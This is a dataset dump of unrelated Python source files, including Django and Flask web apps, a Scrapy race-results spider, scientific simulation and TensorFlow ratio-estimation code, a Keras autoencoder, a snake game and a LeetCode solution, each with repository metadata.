D['S']['people'][1:,:,:].sum(axis=(0,1))\n\nfigure()\nhold(True)\nplot(tvec[1:], diff(plhiv))\nplot(tvec, infections-deaths)\nlegend(('PLHIV(t+1) - PLHIV(t)', 'infections-deaths'))\n\n\nimport plotpeople as pp\npp.plotpeople(D['S'])\n\n\nif exportdata:\n savetxt(\"infections.csv\", infections, delimiter=\";\")\n savetxt(\"deaths.csv\", deaths, delimiter=\";\")\n savetxt(\"plhiv.csv\", plhiv, delimiter=\";\")\n\n\n\n","sub_path":"cotedivoire/pre2016oct09/plhivcalcs.py","file_name":"plhivcalcs.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"484797904","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import *\nfrom .serializers import *\nfrom django.http import JsonResponse\nfrom rest_framework.parsers import JSONParser\n\n\ndef downloadResume(request):\n resume = Resume.objects.order_by('-uploadDate')[:1]\n serializer = ResumeSerializer(resume,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data},safe=False,status=200)\n\n\ndef projectsList(request):\n if request.method == 'GET':\n projects = Projects.objects.all()\n serializer = ProjectSerializer(projects,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data},safe=False,status=200)\n\n\n@csrf_exempt\ndef projectDetails(request,projectname):\n if request.method == 'POST':\n project = Projects.objects.filter(slug=projectname)\n serializer = ProjectDetailsSerializer(project,many=True)\n\n tags = 
ProjectTech.objects.filter(projectName=serializer.data[0]['id'])\n tagSerializer = TagSerializer(tags,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data,'tech':tagSerializer.data},safe=False,status=200)\n \n return render(request,'projectsdeatils.html')\n\n\ndef latestProject(request):\n if request.method == 'GET':\n projects = Projects.objects.order_by('-uploadedDate')[:3]\n serializer = LatestProjects(projects,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data},status=200,safe=False)\n\n@csrf_exempt\ndef contact(request):\n if request.method == 'POST':\n data = JSONParser().parse(request)\n \n try:\n contact = Contact.objects.create(\n firstName=data['firstName'], lastName=data['lastName'],emailId=data['email'],message=data['message'])\n return JsonResponse({'status':True,'message':'Form Submitted SuccesFully'},safe=False, status=200)\n\n except:\n return JsonResponse({'status':False,'message':'There was an Error on Submiting Form. Please try again or after Sometime'},safe=False, status=200)\n\n\ndef about(request):\n if request.method == 'GET':\n aboutme = Aboutme.objects.all()\n aboutmeSerializer = AboutmeSerializer(aboutme,many=True)\n\n education = Education.objects.all()\n educationSerializer = EducationSerializer(education,many=True)\n\n experience = Experiences.objects.all()\n experienceSerializer = ExperienceSerializer(experience,many=True)\n\n certification = Certification.objects.all()\n certificationSerializer = CertificationSerializer(certification,many=True)\n\n skills = Skills.objects.all()\n skillsSerializer = SkillsSerializer(skills,many=True)\n\n return JsonResponse({'status':True,\n 'about':aboutmeSerializer.data, 'education':educationSerializer.data , 'experience':experienceSerializer.data,\n 'certification':certificationSerializer.data, 'skills':skillsSerializer.data})\n\n\ndef servicesList(request):\n if request.method == 'GET':\n services = Services.objects.all()\n serializer = ServiceSerializer(services,many=True)\n return JsonResponse({'status':True,'data':serializer.data},safe=False,status=200)\n\n\n@csrf_exempt\ndef servicesDetails(request,servicename):\n if request.method == 'POST':\n service = Services.objects.filter(slug=servicename)\n serializer = ServiceSerializer(service,many=True)\n\n return JsonResponse({'status':True,'data':serializer.data},safe=True,status=200)\n\n return render(request,'servicesDetails.html')","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"233820051","text":"\nfrom flask import Flask, render_template, request\nimport datetime\nimport random\n\n# 플라스크서버의 이름이 app이다\napp = Flask(__name__)\n\n#url을 관리해주는 친구 >@app.rout\n@app.route(\"/\")\ndef hello() :\n return \"안녕안녕!!!\"\n\n@app.route(\"/christmas\")\ndef christmas() :\n today = datetime.datetime.now()\n \n month = today.date().month\n day = today.date().day\n\n if month ==12 and day ==25 : \n return \"
YES\"\n\n else : \n return \"NO
\"\n \n \n\n\n@app.route(\"/dday\")\ndef dday() :\n today = datetime.datetime.now()\n final = datetime.datetime(2020,6,9)\n result = final - today \n return f\"{result.days}일 남았습니다.\"\n\n\n\n@app.route(\"/movies\")\ndef movies() :\n movies = [\"겨울왕국2\",\"클라우스\", \"어바웃타임\", \"나홀로 집에1\"]\n return render_template(\"movie.html\",movies = movies, text = \"목록\")\n \n@app.route(\"/greeting/\")\ndef greeting(name) : \n\n return f\"안녕하세요! {name}님!\"\n\n@app.route(\"/cube/\")\ndef cube(num) :\n result = num **3\n return str(result)\n\n\n@app.route(\"/lunch/\")\ndef lunch(num) :\n menu = [\"자장면\",\"짬뽕\",\"오므라이스\",\"볶음밥\"]\n c_menu = random.sample(menu,num)\n return render_template(\"movie.html\",movies=c_menu,text = \"목록\")\n\n\n\n@app.route(\"/vonvon\")\ndef vonvon():\n return render_template(\"vonvon.html\")\n\n\n@app.route(\"/godmademe\")\ndef godmademe():\n name = request.args.get(\"name\")\n print(name)\n first_list = [\"못생김\",\"어중간함\",\"착하게생김\",\"공부잘하게생김\",\"매력\",\"덕후력\"]\n second_list = [\"애교\",\"잘난척\",\"쑥스러움\",\"다혈질\",\"자신감\",\"웃김\"]\n third_list = [\"돈복\",\"찌질\",\"식욕\",\"돈복\",\"착함\",\"멍청함\",\"활기\"]\n\n first = random.sample(first_list,1)\n second = random.sample(second_list,1)\n third = random.sample(third_list,1)\n\n\n return render_template(\"godmademe.html\",name=name,first = first, second = second, third = third)\n\n\n\n#디버그모드 실행은 무조건 python.app.py로 실행\nif __name__ == \"__main__\" :\n app.run(debug=True)\n","sub_path":"python/FLASK_examples/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"231188603","text":"# forcing\n#=======================================================\n\n# This file contains functions used to define the six forcing terms in the 2-L SW equations.\n# F1,4 are the forcings in physical space applied to the zonal momentum equations.\n# F2,5 are the forcings in physical space applied to the meridional momentum equations.\n# F3,6 are the forcings in physical space applied to the continuity equations.\n# The appropriate forcing function is called in RSW.py, depending on options defined in inputFile.py.\n\n#=======================================================\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom diagnostics import diff, extend\n\n#=======================================================\n\n# forcing_cts\ndef forcing_cts(x_nd,y_nd,K_nd,y0_nd,r0_nd,N,FORCE1,AmpF_nd,f_nd,U,L,rho1_nd,rho2_nd,dx_nd,dy_nd):\n# Takes input defined in the 2-layer input file.\n\n\tI = np.complex(0,1);\n\n\tNx = N;\t\t# This variable can be changed for testing purposes.\n\n\t# Initialise empty forcing arrays.\n\t# F4 and F5 are just empty arrays, and will be defined at the end.\n\tF1_nd = np.zeros((N,Nx));\t# u1\n\tF2_nd = np.zeros((N,Nx));\t# v1\n\tF3_nd = np.zeros((N,Nx));\t# h1\n\tF6_nd = np.zeros((N,Nx));\t# h2\n\n\t#=======================================================\n\n\tif FORCE1 == 'BALANCED':\n\t\tmass = 0.0;\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr_nd = np.sqrt(x_nd[i]**2 + (y_nd[j]-y0_nd)**2);\n\t\t\t\tif r_nd < r0_nd:\n\t\t\t\t\tif r_nd == 0:\n\t\t\t\t\t\tF1_nd[j,i] = 0.0;\n\t\t\t\t\t\tF2_nd[j,i] = 0.0;\t\t\t\t\t\t\n\t\t\t\t\telse:\t\n\t\t\t\t\t\tF1_nd[j,i] = 0.5 * AmpF_nd * np.pi * (y_nd[j]-y0_nd) / (r0_nd * f_nd[j] * r_nd) * np.sin(np.pi * r_nd / r0_nd);\n\t\t\t\t\t\tF2_nd[j,i] = - 0.5 * AmpF_nd * np.pi * x_nd[i] / (r0_nd * f_nd[j] * r_nd) * np.sin(np.pi * r_nd / r0_nd);\n\t\t\t\t\tF3_nd[j,i] = 0.5 * AmpF_nd 
* (1.0 + np.cos(np.pi * r_nd / r0_nd)) / rho2_nd;\n\t\t\t\t\tmass = mass + F3_nd[j,i];\n\t\tmass = mass / (N*Nx);\n\t\tprint(mass)\n\t\tF3_nd = F3_nd - mass;\n\n\t\tF6_nd = - rho1_nd * F3_nd;\n\n\t#=======================================================\n\t\t\t\n\t# Buoyancy only.\n\tif FORCE1 == 'BUOYANCY':\n\t\tmass = 0.0;\n\t\tfor i in range(0,N):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr_nd = np.sqrt(x_nd[i]**2 + (y_nd[j]-y0_nd)**2);\n\t\t\t\tif r_nd < r0_nd:\n\t\t\t\t\tF3_nd[j,i] = 0.5 * AmpF_nd * (1.0 + np.cos(np.pi * r_nd / r0_nd)) / rho2_nd;\n\t\t\t\t\tmass = mass + F3[j,i];\n\t\tmass = mass / (N*Nx);\n\t\tF3_nd = F3_nd - mass;\n\n\t\tF6_nd = - rho1_nd * F3_nd;\n\t\t\n\t#=======================================================\n\n\t# Vorticity only.\n\tif FORCE1 == 'VORTICITY':\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr_nd = np.sqrt(x_nd[i]**2 + (y_nd[j]-y0_nd)**2);\n\t\t\t\tif r_nd < r0_nd:\n\t\t\t\t\tif r_nd == 0:\n\t\t\t\t\t\tF1_nd[j,i] = 0.0;\n\t\t\t\t\t\tF2_nd[j,i] = 0.0;\t\t\t\t\t\t\n\t\t\t\t\telse:\t\n\t\t\t\t\t\tF1_nd[j,i] = 0.5 * AmpF_nd * np.pi * (y_nd[j]-y0_nd) / (r0_nd * f_nd[j] * r_nd) * np.sin(np.pi * r_nd / r0_nd);\n\t\t\t\t\t\tF2_nd[j,i] = - 0.5 * AmpF_nd * np.pi * x_nd[i] / (r0_nd * f_nd[j] * r_nd) * np.sin(np.pi * r_nd / r0_nd);\n\t\t\n\t#=======================================================\t\n\t\n\t# Lastly, Fourier transform the three forcings in the x-direction\n\t\t\n\tFtilde1_nd = dx_nd * np.fft.hfft(F1_nd,N,axis=1);\t# Multiply by dx_nd as FFT differs by this factor compared to FT.\n\tFtilde3_nd = dx_nd * np.fft.hfft(F3_nd,N,axis=1); \n\tFtilde2_nd = dx_nd * np.fft.fft(F2_nd,axis=1);\n\tFtilde6_nd = - rho1_nd * Ftilde3_nd;\n\n\t#=======================================================\n\n\t# Define arrays of zeros.\n\tF4_nd = np.zeros((N,Nx));\n\tF5_nd = np.zeros((N,Nx));\n\tFtilde4_nd = np.zeros((N,Nx));\n\tFtilde5_nd = np.zeros((N,Nx));\n\n\treturn F1_nd, F2_nd, F3_nd, F4_nd, F5_nd, F6_nd, Ftilde1_nd, Ftilde2_nd, Ftilde3_nd, Ftilde4_nd, Ftilde5_nd, Ftilde6_nd;\n\n#=======================================================\n#=======================================================\n\n# forcing_dcts\ndef forcing_dcts(x,y,K,y0,r0,N,FORCE1,FORCE2,AmpF,g,f,f0,U,L,rho1_nd,rho2_nd,dx,dy):\n# Takes input defined in the 2-layer input file.\n\n\tI = np.complex(0,1);\n\n\tNx = N;\t\t# This variable can be changed for testing purposes.\n\n\t# Initialise empty forcing arrays.\n\t# F4 and F5 are just empty arrays, and will be defined at the end.\n\tF1_nd = np.zeros((N,Nx));\t# u1\n\tF2_nd = np.zeros((N,Nx));\t# v1\n\tF3_nd = np.zeros((N,Nx));\t# h1\n\tF6_nd = np.zeros((N,Nx));\t# h2\n\n\t#=======================================================\n\n\tif FORCE1 == 'BALANCED':\n\t\tmass = 0;\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr = np.sqrt(x[i]**2 + (y[j]-y0)**2);\n\t\t\t\tif r < r0:\t\n\t\t\t\t\tcount = count + 1;\n\t\t\t\t\tif r == 0:\n\t\t\t\t\t\tF1[j,i] = 0;\n\t\t\t\t\t\tF2[j,i] = 0;\n\t\t\t\t\telse:\n\t\t\t\t\t\tF1[j,i] = AmpF * np.pi * g * (y[j]-y0) / (2 * r0 * f[j] * r) * np.sin((np.pi / 2) * r / r0);\n\t\t\t\t\t\tF2[j,i] = - AmpF * np.pi * g * x[i] / (2 * r0 * f[j] * r) * np.sin((np.pi / 2) * r / r0);\n\t\t\t\t\tF3[j,i] = AmpF * np.cos((np.pi / 2) * r / r0) / rho2_nd;\n\t\t\t\t\tmass = mass + F3[j,i];\n\t\tmass = mass / (N*(Nx) - count);\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr = np.sqrt(x[i]**2 + (y[j]-y0)**2);\n\t\t\t\tif r >= r0:\n\t\t\t\t\tF3[j,i] = - mass;\n\t\t#F3x = 
diff(F3,1,1,dx);\n\t\t#F3y = diff(F3,0,0,dy);\n\t\t#for j in range(0,N):\n\t\t#\tF1[j,:] = - g * F3y[j,:] / f[j];\n\t\t#\tF2[j,:] = g * F3x[j,:] / f[j];\n\n\tF6 = - rho1_nd * F3\n\n\t#=======================================================\n\t\t\t\n\t# Buoyancy only.\n\tif FORCE1 == 'BUOYANCY':\n\t\tcount = 0;\n\t\tmass = 0;\n\t\tfor i in range(0,Nx):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr = np.sqrt(x[i]**2 + (y[j]-y0)**2);\n\t\t\t\tif r= r0:\n\t\t\t\t\tF3[j,i] = - mass;\n\t\t\n\t#=======================================================\n\n\t# Vorticity only.\n\tif FORCE1 == 'VORTICITY':\n\t\tfor i in range(0,N+1):\n\t\t\tfor j in range(0,N):\n\t\t\t\tr = np.sqrt(x[i]**2 + (y[j]-y0)**2);\n\t\t\t\tif r div > div.performance > table > tbody > tr')\n for row in rows:\n cells = row.css('td') \n \n yield {\n 'place': cells[0].css('td').css('::text').extract_first(),\n 'horse_no': cells[1].css('td').css('::text').extract_first(),\n 'horse_id': re.search('HorseId=([\\w\\d]+)', cells[2].css('td').css('a::attr(href)').extract_first())[1],\n 'jockey_id': re.search('JockeyId=([\\w\\d]+)', cells[3].css('td').css('a::attr(href)').extract_first())[1],\n 'trainer_id': re.search('TrainerId=([\\w\\d]+)', cells[4].css('td').css('a::attr(href)').extract_first())[1],\n 'actual_weight': cells[5].css('td').css('::text').extract_first(),\n 'declared_horse_weight': cells[6].css('td').css('::text').extract_first(),\n 'draw': cells[7].css('td').css('::text').extract_first(),\n 'lbw': cells[8].css('td').css('::text').extract_first(),\n 'running_position': [re.sub(r'[\\r\\n ]+', '', c) for c in cells[9].css('td').css('div > div::text').extract()],\n 'finish_time': cells[10].css('td').css('::text').extract_first(),\n 'win_odds': cells[11].css('td').css('::text').extract_first(),\n }\n\nimport json\n\nclass JsonWriterPipeline(object):\n\n def open_spider(self, spider):\n self.file = open('quoteresult.jl', 'w')\n\n def close_spider(self, spider):\n self.file.close()\n\n def process_item(self, item, spider):\n line = json.dumps(dict(item)) + \"\\n\"\n self.file.write(line)\n return item\n\n\nfrom pprint import pprint\n\nclass StdoutWriterPipeline(object):\n\n def open_spider(self, spider):\n pass\n\n def close_spider(self, spider):\n pass\n\n def process_item(self, item, spider):\n pprint(item)\n return item\n","sub_path":"RaceResultSpider.py","file_name":"RaceResultSpider.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"628662770","text":"\nimport numpy as np\nfrom tensorflow.python.keras.layers import *\nfrom tensorflow.python.keras.models import Model, Sequential\n\ndef model_fn(shape=(32,32,1), nblocks=5, base_dim=4, nstack_layer=3) :\n \"\"\"\n Reference: https://blog.keras.io/building-autoencoders-in-keras.html\n base_dim: 4\n nblocks : 5\n nstack_layer: 3. Number of conv layer / block\n \"\"\"\n def convSeries_fn(x,\n filters=16, \n kernel_size=3, \n nstack_layer=3, \n stride=2, \n init_filter=16,\n channels=6,\n up=True, \n pooling=True\n ):\n \"\"\"\n INPUT\n nstack_layer : number of iteration of conv layer before batch_norm. default 3.\n up : boolean. 
True is encoder, False is decoder(conv2D transpose)\n \"\"\"\n for idx in range(nstack_layer):\n if up:\n if idx == 0:\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding='same',\n strides=stride,\n kernel_initializer='he_normal')(x)\n x = LeakyReLU()(x)\n elif idx == nstack_layer - 1:\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding='same',\n kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n else:\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding='same',\n kernel_initializer='he_normal')(x)\n x = LeakyReLU()(x)\n else:\n if idx == nstack_layer-1:\n x = Conv2DTranspose(filters=int(filters/2), kernel_size=kernel_size, \n strides=(stride,stride), padding='same')(x)\n x = BatchNormalization()(x)\n else:\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding='same',\n kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n \n return x\n\n # set params\n init_filters = 2**(base_dim) \n params = {\n 'filters': [ 2**(i+base_dim+1) for i in range(nblocks-1)],\n 'kernel_size': 3\n } # remainded n-1 blocks\n channels = shape[-1]\n\n ## start construction\n x = inp = Input(shape=shape, name='encoding_input')\n #----------------------------------------------------------------------------------------------\n # encoder layers\n #----------------------------------------------------------------------------------------------\n ## first block with same size\n # keep the first layer size\n for _ilayer in range(nstack_layer): \n x = Conv2D(filters=init_filters, kernel_size=3, padding='same', kernel_initializer='he_normal')(x)\n if _ilayer == nstack_layer - 1:\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n # encoder layers\n for iblock in range(nblocks-1):\n filters = params[\"filters\"][iblock]\n kernel_size = params[\"kernel_size\"]\n if iblock != nblocks-1:\n x = convSeries_fn(x,filters=filters, kernel_size=kernel_size, nstack_layer=nstack_layer, up=True)\n \n # build model for encoder + digit layer\n encoder = Model(inp, x, name='encoder')\n \n x = inp = Input(x.shape[1:], name=\"decoder_input\")\n #----------------------------------------------------------------------------------------------\n # decoder layers\n #----------------------------------------------------------------------------------------------\n x = Conv2D(filters=params[\"filters\"][-1], kernel_size=3, padding='same', kernel_initializer='he_normal')(x)\n x = LeakyReLU()(x)\n for iblock in range(nblocks-1):\n filters = params[\"filters\"][::-1][iblock]\n kernel_size = params[\"kernel_size\"]\n x = convSeries_fn(x,filters=filters, kernel_size=kernel_size,\n nstack_layer=nstack_layer, init_filter=params['filters'][0],channels=channels, up=False)\n\n # final block\n for _ilayer in range(nstack_layer-1): \n x = Conv2D(filters=init_filters, kernel_size=3, padding='same', kernel_initializer='he_normal')(x)\n if _ilayer == nstack_layer - 1:\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n # final layer\n x = Conv2D(filters=channels, kernel_size=3, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n \n decoder = Model(inp, x, name='decoder')\n \n return encoder, decoder\n\n","sub_path":"active_codes/models_update.py","file_name":"models_update.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"533051398","text":"import pygame\n\nfrom plateau import Plateau\nfrom constante 
import Constante\n\n########## class ##########\n\nclass Game:\n\n @classmethod\n def emitEvent(self, name):\n event = pygame.event.Event(name)\n pygame.event.post(event)\n\n def __init__(self, row=10, column=10):\n self.plateau = Plateau(row, column)\n self.last_direction = Constante.DOWN\n self.score = 0\n self.nb_step = 0\n self.nb_step_max_by_score = (row + column) * 4\n \n def init(self):\n self.last_direction = Constante.DOWN\n self.score = 0\n self.nb_step = 0\n self.plateau.init()\n \n def move(self, direction):\n if Constante.OPPOSIT_ACTION[self.last_direction] == direction:\n return False\n self.last_direction = direction\n coderetour = self.plateau.move(direction)\n if (coderetour == Plateau.RET_MOVE_NORMAL):\n self.nb_step += 1\n if (self.nb_step > (self.nb_step_max_by_score * (self.score + 1))):\n self.emitEvent(Constante.EVENT_TOO_MUCH_STEP)\n if (coderetour == Plateau.RET_MOVE_EAT_WALL):\n self.emitEvent(Constante.EVENT_EAT_WALL)\n if (coderetour == Plateau.RET_MOVE_EAT_VERTABRATE):\n self.emitEvent(Constante.EVENT_EAT_VERTEBRATE)\n if (coderetour == Plateau.RET_MOVE_EAT_APPLE):\n self.score += 1\n self.emitEvent(Constante.EVENT_EAT_APPLE)\n return coderetour\n\n ########## action des buttons ##########\n def increase_nb_step(self):\n self.nb_step_max_by_score = self.nb_step_max_by_score - 1\n\n def decrease_nb_step(self):\n self.nb_step_max_by_score = self.nb_step_max_by_score + 1\n \n def kill(self):\n self.emitEvent(Constante.EVENT_KILL)\n\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"288757088","text":"import unittest\n\n\ndef findLexSmallestString(self, s: str, a: int, b: int) -> str:\n queue = [s]\n ans = s\n seen = set()\n while queue:\n size = len(queue)\n for i in range(size):\n current = queue.pop()\n ans = min(current, ans)\n rotate = current[b:] + current[:b]\n if rotate not in seen:\n seen.add(rotate)\n queue.append(rotate)\n t = transform(current, a)\n if t not in seen:\n seen.add(t)\n queue.append(t)\n return ans\n\n\ndef transform(s: str, delta: int):\n ans = ''\n for i, c in enumerate(s):\n if i % 2 == 1:\n ans += str((int(c) + delta) % 10)\n else:\n ans += c\n return ans\n\n\nclass MyTestCase(unittest.TestCase):\n def test_something(self):\n self.assertEqual('2050', findLexSmallestString(self, '5525', 5, 2))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"1625.py","file_name":"1625.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"491152256","text":"import warnings\nwarnings.filterwarnings('ignore')\nimport tensorflow as tf\nimport numpy as np\nimport seaborn as sns; \nimport tensorflow_probability as tfp\ntfd = tfp.distributions\nfrom scipy.stats import norm, uniform, cauchy\nimport sys\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nslim = tf.contrib.slim\nfrom tqdm.notebook import tqdm\nfrom time import sleep\nfrom IPython.display import display, clear_output\nimport pickle\nimport os\nfrom scipy.linalg import cholesky\nimport math\n\n\n\n\ntol = 1e-35\nbs = 500\nK = 3\ndo = 0.8\n\n\ndef reset(seed=40):\n tf.reset_default_graph()\n tf.random.set_random_seed(seed)\n \n\ndef ratios_critic(x, prob = 1, K=3, deep=False):\n with tf.variable_scope('critic', reuse=tf.AUTO_REUSE) as scope:\n \n q1 = tf.get_variable('q1',1.)\n q2 = tf.get_variable('q2',1.)\n q3 = 
tf.get_variable('q3',1.)\n \n q4 = tf.get_variable('q4',1.)\n q5 = tf.get_variable('q5',1.)\n q6 = tf.get_variable('q6',1.)\n \n b1 = tf.get_variable('b1',1.)\n b2 = tf.get_variable('b2',1.)\n b3 = tf.get_variable('b3',1.)\n \n s1 = tf.get_variable('s1',1.)\n s2 = tf.get_variable('s2',1.)\n s3 = tf.get_variable('s3',1.)\n \n t1 = tf.get_variable('t1',1.)\n t2 = tf.get_variable('t2',1.)\n t3 = tf.get_variable('t3',1.)\n\n# h1 = 1e12*(x-q1)*(x-q1)*s1 + (x-q4)*t1 + b1 \n h1 = (x-q1)*(x-q1)*s1 + (x-q4)*t1 + b1 \n h2 = (x-q2)*(x-q2)*s2 + (x-q5)*t2 + b2\n h3 = t3*(x-q6) + b3# t3*(x-q6) + b3 #(x-q3)*(x-q3)*s3 + t3*(x-q6) + b3\n# h3 = slim.fully_connected(tf.concat([h1,h2],1), 1, activation_fn=tf.nn.softplus)\n# h3 = slim.fully_connected(h3, 1, activation_fn=None)\n \n \n# h1 = tf.matmul(x,tf.matmul(q1,q1,transpose_b=True))\n# h1 = tf.reduce_sum(x*h1,-1, keep_dims=True) + b1\n \n# h2 = tf.matmul(x,tf.matmul(q2,q2,transpose_b=True))\n# h2 = tf.reduce_sum(x*h2,-1, keep_dims=True) + b2\n \n# h3 = tf.matmul(x,tf.matmul(q3,q3,transpose_b=True))\n# h3 = tf.reduce_sum(x*h3,-1, keep_dims=True) + b3\n \n logits = tf.concat([h1,h2,h3],1)\n \n return logits\n \n# def ratios_critic(x, prob = 1, K=3, deep=False):\n# with tf.variable_scope('critic', reuse=tf.AUTO_REUSE) as scope:\n \n# h = slim.fully_connected(x, 100, activation_fn=tf.nn.softplus)\n# h = tf.nn.dropout(h,prob)\n \n# h = slim.fully_connected(h, 50, activation_fn=tf.nn.softplus)\n# h = tf.nn.dropout(h,prob)\n \n# return slim.fully_connected(h, K, activation_fn=None, biases_initializer = tf.constant_initializer(0))\n\n\n# def get_data(mu_1=0.,mu_2=2.,mu_3=2.,scale_p=0.1,scale_q=0.1,scale_m=1.,mtype='cauchy'):\n# p = tfd.Normal(loc=mu_1, scale=scale_p)\n# q = tfd.Normal(loc=mu_2, scale=scale_q) #tfp.distributions.StudentT(df=1., loc=mu_2, scale=scale_q)#t\n# if mtype=='cauchy':\n# m = tfp.distributions.Cauchy(loc=mu_3, scale=scale_m)\n# if mtype=='cauchy_mix':\n# mix = 0.3\n# m = tfp.distributions.Mixture(\n# cat=tfp.distributions.Categorical(probs=[.6,.4]),\n# components=[\n# p,\n# q\n# ])\n# elif mtype=='student':\n# m = tfp.distributions.StudentT(df=1., loc=mu_3, scale=scale_m)\n# else:\n# m = tfp.distributions.Normal(loc=mu_3, scale=scale_m)\n \n# p_samples = p.sample([bs]) \n# q_samples = q.sample([bs])\n# alpha = tfd.Uniform (0.,1.).sample([bs])\n# m_samples = m.sample([bs]) #tf.sqrt(1-alpha*alpha)*p_samples + alpha*q_samples + m.sample([bs])\n \n# return p, q, m, p_samples, q_samples, m_samples, m\n\n\ndef get_gt_ratio_kl(p,q,samples):\n ratio = p.log_prob(samples) - q.log_prob(samples)\n kl = tf.reduce_mean(ratio)\n try:\n true_kl = p.kl_divergence(q)\n except:\n true_kl = \"-1\"\n \n return ratio, kl, true_kl\n\ndef get_logits(samples, do=1., deep=False, training=True):\n samples = tf.expand_dims(samples,1)\n return ratios_critic(samples, do, deep=deep)\n\ndef get_kl_from_cob(samples):\n log_rat = get_logits(samples)\n return tf.reduce_mean(log_rat[:,0]-log_rat[:,1])\n\ndef get_loss(p_samples,q_samples,m_samples, m_dist=None,do=0.8, deep=False):\n \n logP = get_logits(p_samples, do, deep=deep)\n logQ = get_logits(q_samples, do, deep=deep)\n logM = get_logits(m_samples, do, deep=deep)\n \n a = np.tile([1,0,0],bs)\n b = np.tile([0,1,0],bs)\n c = np.tile([0,0,1],bs)\n\n label_a = tf.reshape(a,[bs,K])\n label_b = tf.reshape(b,[bs,K])\n label_c = tf.reshape(c,[bs,K])\n\n disc_loss_1 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logP, labels=label_a))\n disc_loss_2 = 
tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logQ, labels=label_b))\n disc_loss_3 = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logM, labels=label_c))\n \n loss = disc_loss_1 + disc_loss_2 + disc_loss_3\n \n if m_dist != None:\n loss += 1e-5*tf.reduce_mean(m_dist.log_prob(m_samples) - logM[:,2])\n return loss\n\ndef get_optim(loss, lr=0.001, b1=0.001, b2=0.999):\n t_vars = tf.trainable_variables()\n c_vars = [var for var in t_vars if 'critic' in var.name]\n# optim = tf.train.AdamOptimizer(learning_rate=lr, beta1=b1, beta2=b2).minimize(loss, var_list=t_vars)\n optim = tf.train.AdamOptimizer(lr).minimize(loss, var_list=t_vars)\n return optim\n\n\ndef train(sess, loss, optim, plotlosses, N=30000):\n\n pbar = range(0,N)\n for i in pbar:\n \n feed_dict = {}\n l,_ = sess.run([loss, optim],feed_dict=feed_dict)\n\n if i%1000==0:\n plotlosses.update({\n 'Loss': l,\n })\n plotlosses.send()\n\n \n \ndef sample_and_plot(sess, kld, kl_from_pq, kl_from_cob, p_samples, q_samples, m_samples, log_ratio_p_q, log_ratio_p_m, mu_1, mu_2, scale_p, scale_q, mu_3, scale_m):\n kl_ratio_store=[]\n log_ratio_store=[]\n log_r_p_from_m_direct_store=[]\n\n\n feed_dict = {}\n kl_true, kl_cob, p_s, q_s, m_s, lpq, lpq_from_cob_dre_direct = sess.run([kl_from_pq, kl_from_cob, p_samples, q_samples, m_samples,\n log_ratio_p_q, log_ratio_p_m],\n feed_dict=feed_dict)\n \n \n \n '''Save ratio estimates'''\n data_dir = \"../data/sym/\"+str(scale_p)+\"-\"+str(scale_q)+str(scale_m)+\"/\"\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n \n# f = open(data_dir+\"KLD\"+\".txt\", \"a\")\n# f.write(\"GT for mu_3 = \"+str(mu_3)+\": \"+str(kl_ratio)+\"\\nGT-est: \"+str(kl_true)+\"\\nCoB: \"+str(kl_cob)+\"\\n----------\\n\")\n# f.close()\n log_ratio_store.append(lpq)\n log_r_p_from_m_direct_store.append(lpq_from_cob_dre_direct)\n \n pickle.dump(log_r_p_from_m_direct_store, open(data_dir+\"log_r_p_from_m_direct_store\"+str(mu_3)+\".p\", \"wb\"))\n pickle.dump(m_s, open(data_dir+\"xs\"+str(mu_3)+\".p\", \"wb\"))\n# pickle.dump(log_ratio_store, open(data_dir+\"log_ratio_store\"+str(mu_3)+\".p\", \"wb\"))\n \n xs = m_s\n\n fig, [ax1,ax2,ax3, ax4] = plt.subplots(1, 4,figsize=(13,4))\n ax1.hist(p_s, density=True, histtype='stepfilled', alpha=0.8, label='P')\n ax1.hist(q_s, density=True, histtype='stepfilled', alpha=0.8, label='Q')\n 